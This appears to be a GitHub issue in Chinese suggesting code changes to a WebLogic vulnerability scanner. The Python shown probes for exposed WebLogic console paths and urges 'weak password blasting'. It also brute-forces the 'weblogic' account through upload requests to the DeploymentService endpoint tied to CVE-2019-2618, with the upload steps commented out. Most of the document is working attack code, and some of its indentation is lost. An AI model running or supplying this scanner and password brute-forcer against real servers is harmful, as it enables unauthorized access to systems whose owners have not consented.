修改建议

[huayanqiaq]

增加和修复了一些东西
WeblogicConsole.py修改为
`class WeblogicCosole(object):
headers = {'user-agent': 'ceshi/0.0.1'}

def process(self, ip, port):
    self.run(ip, port)

def islive(self, ur, port):
    url = 'http://' + str(ur) + ':' + str(port) + '/console/login/LoginForm.jsp'
    r = requests.get(url, headers=self.headers)
    return r.status_code

def islive2(self, ur, port):
    url = 'http://' + str(ur) + ':' + str(port) + '/bea_wls_deployment_internal/DeploymentService'
    r = requests.get(url, headers=self.headers)
    return r.status_code

def run(self, url, port):
    if self.islive(url, port) == 200:
        u = 'http://' + str(url) + ':' + str(port) + '/console/login/LoginForm.jsp'
        logging.info(
            "[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(
                u))
        print(
            Color.OKBLUE + "[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(
                u) + Color.ENDC)
        print(Color.OKGREEN + '[+]Weblogic后台路径存在' + Color.ENDC)
    elif self.islive2(url, port) == 200:
        u = 'http://' + str(url) + ':' + str(port) + '/bea_wls_deployment_internal/DeploymentService'
        logging.info(
            "[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(
                u))
        print(
            Color.OKBLUE + "[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(
                u) + Color.ENDC)
        print(Color.OKGREEN + '[+]Weblogic后台路径存在' + Color.ENDC)
    else:
        logging.info('[-]Target Weblogic console address not found!')
        print(Color.FAIL + "[-]Target Weblogic console address not found!" + Color.ENDC)

CVE-2019-2618.py 修改为（考虑到很多weblogic不是第一次部署随机字符串会改变）： def check(self, url):
vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name="file"; filename="11.tmp"\r\nContent-Type: text/html\r\n\r\n 12341234 \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--"
success = False
for password in passwd:
headers = {
'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
"username": "weblogic",
"password": password,
'wl_request_type': "app_upload",
'wl_upload_application_name': "/",
'archive': "true",
}
try:
req = requests.post(url=vuln_url, data=payload, headers=headers)
if "290014" not in req.text and req.status_code != 401:
# serverName = re.findall('/servers/(.*?)/upload/', req.text, re.S)[0]
print(Color.OKBLUE + "[+]口令爆破成功:weblogic/" + password + Color.ENDC)
# print(Color.OKBLUE+"[+]weblogic服务名:" + serverName+Color.ENDC)
# path = self.get_path(serverName)
# print(Color.OKBLUE+"[+]8位随机字符目录:" + path+Color.ENDC)
# print(Color.GREEN+"[+]CVE-2019-2618漏洞存在"+Color.ENDC)
# self.testupload(url,password,path)
# success = True
# print(Color.OKGREEN+"[+]CVE-2019-2618 漏洞存在"+Color.ENDC)
break
else:
print(Color.FAIL + "[-]口令爆破失败：weblogic/" + password + Color.ENDC)
pass
except:
# print("[-]口令请求异常:weblogic/" + password)
traceback.print_exc()
pass
if True != success:
print(Color.FAIL + "[-]target Weblogic is not Vul CVE-2019-2618" + Color.ENDC)`